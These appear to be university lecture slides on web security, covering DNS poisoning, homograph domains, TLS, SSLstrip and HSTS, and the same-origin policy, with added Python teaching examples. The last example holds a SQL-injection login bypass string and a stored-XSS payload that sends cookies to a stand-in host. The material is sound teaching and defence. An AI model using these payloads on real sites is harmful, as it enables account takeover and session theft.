Web Security
Philipp Winter
philwint@kau.se
Karlstad University
Oct.11,2012
What does it contain?
The Web consists mostly of:
- Protocols: HTTP, TLS/X.509, DNS
- Content: HTML, Flash, JavaScript, ...
What happens when you go to https://www.kau.se?
1. Your local DNS resolver sends a request for www.kau.se, which hopefully resolves to the correct IP address.
2. Your browser establishes a TCP connection to that IP address.
3. Your browser initiates a TLS connection and receives a certificate which hopefully really belongs to www.kau.se.
4. Your browser fetches a web page which hopefully does not contain malicious HTML or JavaScript.
There are many ways to mess with this process: every step trusts data that someone on the path may be able to forge.
DNS
A Reminder
- The Domain Name System maps host names to IP addresses.
- Makes life easier for humans and provides additional flexibility.
- DNS servers are queried for www.kau.se and return 193.10.226.10.
DNS Cache Poisoning
- Conceptually similar to ARP cache poisoning.
- Attacker wants the victim to resolve www.kau.se to his own malicious machine instead of the real KAU web server.
- Attacker makes a remote DNS cache store a wrong mapping from domain name to IP address.
- Mostly, cache poisoning is possible because DNS replies are not signed: a resolver accepts the first reply that matches the transaction ID (and source port) of its outstanding query, so a spoofed reply that wins the race against the real server gets cached. "Solution": DNSSEC.
- ISPs have full control over DNS traffic and can manipulate DNS queries and replies, e.g. to conduct censorship.
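The race described above, as an added example written for these slides (not code from the lecture): it builds real DNS wire-format packets but simulates resolver, attacker and network in-process, so it runs offline. It goes one step beyond the slide by contrasting a resolver that checks only the 16-bit transaction ID with one that also checks the randomized source port. The attacker's IP address and the numbers of forged replies are constructed.

```python
"""Toy model of DNS cache poisoning: why unsigned replies are a problem.

Added example written for these slides, not code from the lecture. It builds
real DNS wire-format packets, but resolver, attacker and network are simulated
in-process (no sockets), so it runs offline. The attacker's IP is constructed.
"""
import random
import struct

A_RECORD, IN_CLASS = 1, 1
REAL_IP = "193.10.226.10"      # www.kau.se according to the slides
EVIL_IP = "203.0.113.66"       # constructed attacker address (TEST-NET-3)


def encode_name(name):
    """'www.kau.se' -> b'\\x03www\\x03kau\\x02se\\x00' (DNS label format)."""
    return b"".join(bytes([len(l)]) + l.encode() for l in name.split(".")) + b"\x00"


def build_response(txid, name, ip, ttl=300):
    """Minimal DNS answer: 12-byte header, echoed question, one A record."""
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)  # QR=1, RD, RA; 1 Q, 1 answer
    question = encode_name(name) + struct.pack("!HH", A_RECORD, IN_CLASS)
    rr = b"\xc0\x0c" + struct.pack("!HHIH", A_RECORD, IN_CLASS, ttl, 4)  # 0xc00c: pointer to offset 12
    rr += bytes(int(octet) for octet in ip.split("."))
    return header + question + rr


def parse_response(pkt):
    """Return (txid, name, ip) from a packet produced by build_response."""
    txid = struct.unpack("!H", pkt[:2])[0]
    labels, pos = [], 12
    while pkt[pos]:
        n = pkt[pos]
        labels.append(pkt[pos + 1:pos + 1 + n].decode())
        pos += 1 + n
    pos += 1 + 4 + 2 + 10    # name terminator, QTYPE/QCLASS, name pointer, TYPE/CLASS/TTL/RDLENGTH
    ip = ".".join(str(b) for b in pkt[pos:pos + 4])
    return txid, ".".join(labels), ip


class Resolver:
    """Caching resolver with one outstanding query at a time.

    check_port=False: accept any reply whose 16-bit transaction ID matches
    (the behaviour Kaminsky's 2008 attack exploited).
    check_port=True: additionally require the reply to hit the query's random
    source port, roughly 32 bits of entropy in total.
    Neither variant verifies *who* sent the reply; only DNSSEC signatures would.
    """

    def __init__(self, seed, check_port):
        self.rng = random.Random(seed)
        self.check_port = check_port
        self.cache, self.pending = {}, None

    def query(self, name):
        self.pending = (name, self.rng.randrange(1 << 16), self.rng.randrange(1024, 1 << 16))
        return self.pending                       # (name, txid, source port)

    def receive(self, pkt, dst_port):
        """Accept a reply if it matches the pending query; True if it was cached."""
        if self.pending is None:
            return False
        name, txid, port = self.pending
        if struct.unpack("!H", pkt[:2])[0] != txid:
            return False
        if self.check_port and dst_port != port:
            return False
        _, got_name, ip = parse_response(pkt)
        if got_name != name:
            return False
        self.cache[name] = ip
        self.pending = None
        return True


def poison(resolver, name, forged_replies, atk_rng):
    """Off-path attacker: guess txid/port `forged_replies` times before the
    genuine answer arrives. Returns True if EVIL_IP ends up in the cache."""
    resolver.query(name)
    for _ in range(forged_replies):
        pkt = build_response(atk_rng.randrange(1 << 16), name, EVIL_IP)
        if resolver.receive(pkt, atk_rng.randrange(1024, 1 << 16)):
            return True
    _, txid, port = resolver.pending               # the real server saw the query, so it knows both
    resolver.receive(build_response(txid, name, REAL_IP), port)
    return False


def success_rate(check_port, trials=100, forged_replies=5000, seed=1):
    """Fraction of trials in which the attacker wins the race."""
    atk_rng = random.Random(seed + 1)
    wins = 0
    for t in range(trials):
        wins += poison(Resolver(seed * 1000 + t, check_port), "www.kau.se", forged_replies, atk_rng)
    return wins / trials
```

With 5000 forged replies per query, the txid-only resolver is poisoned in roughly 7% of attempts, while the port-checking resolver essentially never is; the attacker's real-world trick (Kaminsky) is to trigger many queries for throw-away names so that each one is a fresh lottery ticket.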
DNS: A More Exotic Problem
- Certain characters in some fonts look very similar (paypal.com vs. paypaI.com, with a capital I in place of the l).
- Non-ASCII in DNS names (punycode/IDN domains) made this problem worse: a Cyrillic а is indistinguishable from a Latin a on screen.
- This problem is not limited to DNS! Can you think of something else?
- Bitcoin tackles this problem by avoiding certain characters (0OIl) in addresses [1].
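A detector for both kinds of look-alike names, as an added example written for these slides (not from the lecture). It decodes punycode with Python's standard idna codec, flags labels that mix scripts, and compares a crude visual "skeleton" of two names; the confusable table is a small hand-picked subset (Unicode TR39 has the full one) and the sample domains are constructed.

```python
"""Spotting look-alike (homograph) domain names.

Added example, not from the slides. Covers ASCII confusables such as
paypaI.com (capital I for lowercase l) and IDN domains that mix scripts,
such as a Cyrillic 'а' in pаypal.com. CONFUSABLE is a partial table.
"""
import unicodedata

# Characters that render alike in many fonts, mapped onto one representative.
# The ASCII entries are exactly the ones Bitcoin's Base58 alphabet leaves out.
CONFUSABLE = {
    "0": "o", "O": "o", "I": "l", "1": "l",
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p",   # Cyrillic а е о р
    "\u0441": "c", "\u0445": "x", "\u0443": "y", "\u0456": "i",   # Cyrillic с х у і
}


def to_unicode(domain):
    """xn--pypal-4ve.com -> pаypal.com (punycode labels decoded, ASCII kept)."""
    return domain.encode("ascii").decode("idna")


def to_punycode(domain):
    """pаypal.com -> xn--pypal-4ve.com, the form a browser sends to DNS."""
    return domain.encode("idna").decode("ascii")


def script_of(ch):
    """Coarse script of a letter, taken from its Unicode character name."""
    name = unicodedata.name(ch, "")
    for script in ("LATIN", "CYRILLIC", "GREEK"):
        if name.startswith(script):
            return script
    return "OTHER"


def mixed_scripts(domain):
    """True if any single label mixes letters from more than one script, the
    tell-tale sign of the pаypal.com trick (browsers apply similar rules when
    deciding whether to show the Unicode form or the raw xn-- label)."""
    for label in to_unicode(domain).split("."):
        scripts = {script_of(c) for c in label if c.isalpha()}
        if len(scripts) > 1:
            return True
    return False


def skeleton(domain):
    """Visual skeleton: decode punycode, map confusables, normalize, fold case.
    Two domains with the same skeleton look the same on screen."""
    text = to_unicode(domain)
    text = "".join(CONFUSABLE.get(c, c) for c in text)
    return unicodedata.normalize("NFKC", text).lower()


def looks_like(candidate, trusted):
    """Reason string if `candidate` imitates `trusted` without being the same
    domain, else None."""
    if candidate.lower() == trusted.lower():
        return None
    if skeleton(candidate) == skeleton(trusted):
        how = "mixed-script IDN" if mixed_scripts(candidate) else "ASCII confusables"
        return f"{candidate} looks like {trusted} ({how})"
    return None
```

The skeleton comparison is deliberately lossy: it is meant to raise a warning, not to prove two names are distinct, which is why browsers combine such heuristics with a whitelist of scripts allowed per top-level domain.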
SSL/TLS
Overview (1/2)
- Transport Layer Security is the successor of Secure Sockets Layer.
- While TLS secures TCP-based traffic, DTLS (Datagram TLS) can be used for UDP.
- Both are crypto protocols to protect confidentiality, authenticity and integrity.
- SSL/TLS is used by web browsers, chat clients, VoIP software, ... [2]
- Plaintext protocols got secured counterparts: HTTP → HTTPS, telnet → SSH, FTP → SFTP, ... (HTTPS runs over TLS; SSH and SFTP use the SSH transport instead, and the TLS variant of FTP is called FTPS.)
Overview (2/2)
- TLS is a layer between TCP and the application layer protocol (e.g. HTTP).
- Newest version is TLS 1.2 (RFC 5246). Standardized in 2008 but, as of 2012, not yet widely available in software.
- Popular implementations: OpenSSL, GnuTLS, NSS.
TLS and X.509
- X.509 is a PKI standard and specifies certificates, CRLs, path validation algorithms and much more.
- TLS is tightly coupled with X.509 certificates to provide authentication.
- Connect and dump the server's certificate chain (add -servername www.kau.se if the server hosts several names, so that SNI selects the right certificate):
  openssl s_client -connect www.kau.se:443
- Save the block between BEGIN CERTIFICATE and END CERTIFICATE to cert.pem and inspect it:
  openssl x509 -noout -text -inform PEM -in cert.pem
Trusted Third Parties
- Browsers contain dozens of root certificates of trusted third parties.
- Do you really trust these organizations you have never heard of?
- Reminder: any of these CAs can issue a certificate for any name, so it is enough if just one of them turns evil or gets compromised (see Comodo and DigiNotar in 2011 [4])!
TLS and Speed
- TLS can mean an overhead of a factor of 3.4 to 9 over unsecured traffic [3].
- Public-key cryptography is the most expensive part (20% to 58% of the cost).
- AES-NI is the AES instruction set extension for x86; check whether your CPU has it:
  cat /proc/cpuinfo | grep --color=always aes
- Speeds up AES if the TLS library supports it.
- Yet, Google and other huge content providers can afford to enable TLS by default.
The TLS Handshake
Look at Ge's slides from last year.
Let's look at TLS on the wire!
SSLstrip: Preventing HTTPS from Being Used
- Small tool by Moxie Marlinspike [5].
- Sits on the path, scans HTTP traffic and rewrites HTTPS links to HTTP links; it then talks HTTPS to the server itself while the victim keeps talking plain HTTP.
- Also modifies the page to "appear" secure (e.g. by serving a padlock favicon) although it isn't.
- Very simple but highly effective attack: it works because the victim's first request is usually plain HTTP.
HTTP Strict Transport Security
- HSTS is a policy by which a web server tells the browser (via the Strict-Transport-Security response header) that it is to be accessed over HTTPS only.
- A complying browser will automatically turn insecure HTTP links into HTTPS links while HSTS is active for that web server.
- Important: the SSLstrip attack becomes ineffective, once the browser has seen the header at least once over a valid HTTPS connection (the very first visit is still exposed unless the site is on the browser's preload list).
- Also, certificate errors on an HSTS host are hard failures with no click-through: if authenticity is not present, there is no way to proceed anyway.
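Both sides of the last two slides in one place, as an added example written for these slides: a few lines that mimic what sslstrip does to a page it relays over plain HTTP, and a minimal model of a browser's HSTS store following RFC 6797. Neither is the original tool's or any browser's code; the page, headers and host names are constructed.

```python
"""SSLstrip-style link rewriting and the HSTS policy that defeats it.

Added example, not the original tool's or any browser's code. The page,
headers and host names are constructed.
"""
import re
import time
from urllib.parse import urlsplit, urlunsplit

# Constructed page, as the real server would send it.
PAGE = '<a href="https://login.kau.se/">Login</a> <a href="https://www.kau.se/">Home</a>'


def sslstrip(html):
    """What an on-path attacker does to a page relayed over plain HTTP:
    every https:// link becomes http://, so the victim never asks for TLS."""
    return re.sub(r"https://", "http://", html, flags=re.IGNORECASE)


class HstsBrowser:
    """Tiny model of a browser's HSTS store."""

    def __init__(self, now=time.time):
        self.now = now                 # injectable clock so expiry can be tested
        self.store = {}                # host -> (expiry timestamp, includeSubDomains)

    def process_header(self, host, value, over_tls):
        """Handle a Strict-Transport-Security header. RFC 6797: ignore it unless
        it arrived over an error-free TLS connection, otherwise an active
        attacker could plant (or delete) entries."""
        if not over_tls:
            return
        max_age, include_sub = None, False
        for directive in value.split(";"):
            key, _, val = directive.strip().partition("=")
            key = key.strip().lower()
            if key == "max-age":
                try:
                    max_age = int(val.strip().strip('"'))
                except ValueError:
                    return                              # malformed header: ignore it
            elif key == "includesubdomains":
                include_sub = True
        if max_age is None:
            return
        host = host.lower()
        if max_age == 0:
            self.store.pop(host, None)                  # max-age=0 means "forget me"
        else:
            self.store[host] = (self.now() + max_age, include_sub)

    def is_hsts(self, host):
        """True if host, or a parent domain flagged includeSubDomains, has an
        unexpired entry."""
        labels = host.lower().split(".")
        for i in range(len(labels)):
            entry = self.store.get(".".join(labels[i:]))
            if entry is None:
                continue
            expiry, include_sub = entry
            if expiry > self.now() and (i == 0 or include_sub):
                return True
        return False

    def navigate(self, url):
        """URL the browser will actually request: http:// is upgraded to
        https:// for HSTS hosts, which is why stripped links do not help."""
        p = urlsplit(url)
        if p.scheme.lower() != "http" or not p.hostname or not self.is_hsts(p.hostname):
            return url
        netloc = p.hostname if p.port in (None, 80) else f"{p.hostname}:{p.port}"
        return urlunsplit(("https", netloc, p.path, p.query, p.fragment))


def first_visit_then_attack(clock):
    """Scenario: the first visit over TLS records the policy; a later stripped
    page is harmless. Returns the URL requested when clicking the stripped
    login link."""
    browser = HstsBrowser(now=clock)
    browser.process_header("kau.se", "max-age=31536000; includeSubDomains", over_tls=True)
    stripped = sslstrip(PAGE)
    link = re.search(r'href="([^"]+)"', stripped).group(1)     # http://login.kau.se/
    return browser.navigate(link)
```

The two rules that matter in practice are the ones the model enforces explicitly: the header is only honoured over TLS, and entries expire, so a site must keep sending the header (or get preloaded) to stay protected.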
Perspectives/Convergence
- Observation: a MITM is often a local phenomenon. We might be affected here, but not someone in Australia.
- Let's see if in Australia, they see the same certificate!
- Perspectives and Convergence, both browser add-ons, attempt to do that: they ask independent "notaries" at other vantage points which certificate they see for the host and compare it with the one presented locally.
How it Works
(Figure omitted; source: Ars Technica.)
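The comparison the add-ons perform, reduced to its decision rule, as an added example written for these slides (not code from Perspectives or Convergence). Notary names and fingerprints are constructed; a real client fetches the reports over the network and also weighs how long each notary has been seeing a fingerprint. The limitation is visible in the rule itself: if the attacker sits near the server rather than near the client, every notary sees the forged certificate too and the check passes.

```python
"""Notary-style certificate checking, in the spirit of Perspectives/Convergence.

Added example, not code from either add-on. Fingerprints and notary names
are constructed.
"""
from collections import Counter


def verdict(local_fp, notary_reports, quorum):
    """Classify the certificate seen locally.

    notary_reports: {notary_name: fingerprint that notary sees for the host,
                     or None if it could not reach the host}
    quorum: number of agreeing notaries required to trust an answer
    Returns 'ok' (enough notaries see what we see), 'mitm' (enough notaries
    agree on a *different* certificate, so our view is probably intercepted)
    or 'undecided' (not enough data; a cautious client treats this as failure).
    """
    seen = Counter(fp for fp in notary_reports.values() if fp is not None)
    if seen[local_fp] >= quorum:
        return "ok"
    others = {fp: n for fp, n in seen.items() if fp != local_fp}
    if others and max(others.values()) >= quorum:
        return "mitm"
    return "undecided"


# Constructed scenario: three notaries on different continents.
GENUINE = "sha256:1111"
FORGED = "sha256:9999"
REPORTS = {"notary-se": GENUINE, "notary-au": GENUINE, "notary-us": GENUINE}


def local_mitm_detected(quorum=2):
    """We see FORGED (an attacker on our network), everyone else sees GENUINE."""
    return verdict(FORGED, REPORTS, quorum)


def no_problem(quorum=2):
    """We see the same certificate the notaries see."""
    return verdict(GENUINE, REPORTS, quorum)
```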
HTTP and the Web
Social Engineering using Weird URLs (1/2)
What web site is this?
http://www.kau.se@0xd822b52d
Social Engineering using Weird URLs (2/2)
- Everything before the @ is the user-name part of the URL; the host is whatever follows it.
- 216.34.181.45 is the A record of slashdot.org.
- python -c "print(hex((216<<24)+(34<<16)+(181<<8)+45))" prints 0xd822b52d
- 0xd822b52d is that IP address as one hexadecimal number, and browsers accept it as a host.
- http://www.kau.se@0xd822b52d therefore takes you to slashdot.org, not to KAU.
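Taking the URL apart programmatically, as an added example written for these slides (not from the lecture). urllib.parse and ipaddress are standard library; normalize_ipv4 goes beyond the single hex case on the slide and reproduces the legacy inet_aton rules (hex, octal, and fewer than four components) that browsers accepted for IPv4 literals. All sample URLs are constructed.

```python
"""Taking apart http://www.kau.se@0xd822b52d.

Added example, not from the slides. normalize_ipv4 reproduces the legacy
inet_aton syntaxes browsers accepted for IPv4 literals; sample URLs are
constructed.
"""
import ipaddress
from urllib.parse import urlsplit


def normalize_ipv4(host):
    """Dotted-quad form of an IPv4 literal written in any legacy syntax:
    '0xd822b52d', '3626153261', '0330.042.0265.055' and '216.34.46381' all
    mean 216.34.181.45. Returns None if host is not an IPv4 literal."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    values = []
    for p in parts:
        try:
            if p[:2].lower() == "0x":
                values.append(int(p[2:], 16))          # hexadecimal component
            elif len(p) > 1 and p[0] == "0":
                values.append(int(p, 8))               # leading zero: octal
            else:
                values.append(int(p, 10))
        except ValueError:
            return None                                # e.g. 'www', '', '08'
    *head, last = values
    if any(not 0 <= v <= 255 for v in head):
        return None
    tail_bits = 8 * (4 - len(head))        # the last component fills the remaining bytes
    if not 0 <= last < 1 << tail_bits:
        return None
    n = 0
    for v in head:
        n = (n << 8) | v
    n = (n << tail_bits) | last
    return str(ipaddress.IPv4Address(n))


def dword_hex(ip):
    """216.34.181.45 -> '0xd822b52d' (what the slide's one-liner computes)."""
    return hex(int(ipaddress.IPv4Address(ip)))


def explain(url):
    """Split a URL into the part a victim reads and the host actually contacted."""
    p = urlsplit(url)
    host = p.hostname or ""
    return {
        "userinfo": p.username,           # 'www.kau.se': sent as a user name, NOT the host
        "host": host,                     # what DNS and TCP really use
        "ip": normalize_ipv4(host),       # decoded if the host is an IPv4 literal
        "port": p.port if p.port is not None else {"http": 80, "https": 443}.get(p.scheme),
    }
```

Any link checker or proxy filter that looks at the "domain" in a URL needs exactly this split; matching on the string before the first slash would happily report www.kau.se.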
The Same Origin Policy
- Stops code in the twitter tab from messing with the code in the facebook tab.
- Code can only interact if the following three conditions hold:
  - Same domain (twitter.com ≠ facebook.com)
  - Same application layer protocol (HTTPS ≠ HTTP)
  - Same port number (443 ≠ 80)
- So code can only interact if it's from the same origin!
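The three conditions as a check, written as an added example for these slides (not browser code). The one detail the slide hides is the default port: a URL without a port gets its scheme's default, so https://twitter.com and https://twitter.com:443 are one origin. The URLs in CASES are constructed.

```python
"""Same-origin check as a browser performs it.

Added example, not from the slides. An origin is the triple (scheme, host,
port), where a missing port means the scheme's default. URLs are constructed.
"""
from urllib.parse import urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443, "ws": 80, "wss": 443, "ftp": 21}


def origin(url):
    """(scheme, host, port) of a URL; path, query and fragment play no part."""
    p = urlsplit(url)
    scheme = p.scheme.lower()
    host = (p.hostname or "").lower()
    port = p.port if p.port is not None else DEFAULT_PORTS.get(scheme)
    return (scheme, host, port)


def serialize(url):
    """Origin as it appears in the Origin header: the default port is omitted."""
    scheme, host, port = origin(url)
    if port == DEFAULT_PORTS.get(scheme):
        return f"{scheme}://{host}"
    return f"{scheme}://{host}:{port}"


def same_origin(a, b):
    """True if script loaded from `a` may read the DOM and responses of `b`."""
    return origin(a) == origin(b)


# Constructed pairs illustrating the three conditions on the slide.
CASES = [
    ("https://twitter.com/home", "https://facebook.com/", False),         # different host
    ("https://twitter.com/home", "http://twitter.com/home", False),       # different scheme
    ("https://twitter.com:443/home", "https://twitter.com:8443/", False), # different port
    ("https://twitter.com:443/home", "https://twitter.com/other", True),  # default port, other path
    ("https://twitter.com/", "https://api.twitter.com/", False),          # subdomain: different host
]


def check_cases():
    """Cases whose outcome differs from expectation; empty when all agree."""
    return [(a, b) for a, b, expected in CASES if same_origin(a, b) != expected]
```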
Vulnerabilities in the Web
- Browsers and web apps are insanely complex and partially supersede operating systems.
- Vast amount of vulnerabilities which often come down to poor input validation.
- XSS, CSRF, SQL injection, RFI, ...
- All these problems led to web application firewalls.
- Safe playground: Damn Vulnerable Web Application (http://www.dvwa.co.uk).
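Two of the listed bugs in their smallest form, each beside its fix, as an added example written for these slides (not from the lecture or from DVWA): SQL injection against an in-memory SQLite table, and stored XSS in a comment page. The table, rows and payloads are constructed; passwords are stored in plaintext only to keep the example short, a real application stores salted hashes.

```python
"""Poor input validation in one line, twice, with the fix beside each.

Added example, not from the slides or DVWA. Table, rows and payloads are
constructed; plaintext passwords are for brevity only.
"""
import html
import sqlite3


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("alice", "correct horse"), ("bob", "hunter2")])
    return db


def login_vulnerable(db, user, password):
    """String formatting: user input is parsed as part of the SQL statement,
    so the user name  alice'--  comments out the password check entirely."""
    sql = "SELECT COUNT(*) FROM users WHERE name = '%s' AND password = '%s'" % (user, password)
    return db.execute(sql).fetchone()[0] > 0


def login_fixed(db, user, password):
    """Parameterized query: the driver passes input as data, never as SQL."""
    sql = "SELECT COUNT(*) FROM users WHERE name = ? AND password = ?"
    return db.execute(sql, (user, password)).fetchone()[0] > 0


def render_vulnerable(comment):
    """Places input into HTML unchanged: a <script> from one user runs in
    every other user's browser (stored XSS)."""
    return '<p class="comment">%s</p>' % comment


def render_fixed(comment):
    """Escapes <, >, &, quotes before placing text into an HTML element."""
    return '<p class="comment">%s</p>' % html.escape(comment, quote=True)


# Constructed payloads.
PAYLOAD_SQL = "alice'--"
PAYLOAD_XSS = '<script>document.location="http://evil.test/?c="+document.cookie</script>'
```

Both fixes share one idea: keep data and code apart by handing the input to the layer that knows the grammar (the SQL driver, the HTML escaper) instead of pasting it into a string. That is also why a web application firewall, which only sees the pasted result, can never be more than a stopgap.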
Literature
[1] Base58Check encoding. https://en.bitcoin.it/wiki/Base58Check_encoding.
[2] OpenSSL Applications. http://www.openssl.org/related/apps.html.
[3] Cristian Coarfa, Peter Druschel, and Dan S. Wallach. Performance Analysis of TLS Web Servers. In Network & Distributed System Security Symposium. The Internet Society, 2002.
[4] Dennis Fisher. Comodo, DigiNotar Attacks Expose Crumbling Foundation of CA System. https://threatpost.com/en_us/blogs/comodo-diginotar-attacks-expose-crumbling-foundation-ca-system-090211.
[5] Moxie Marlinspike. sslstrip. http://www.thoughtcrime.org/software/sslstrip/.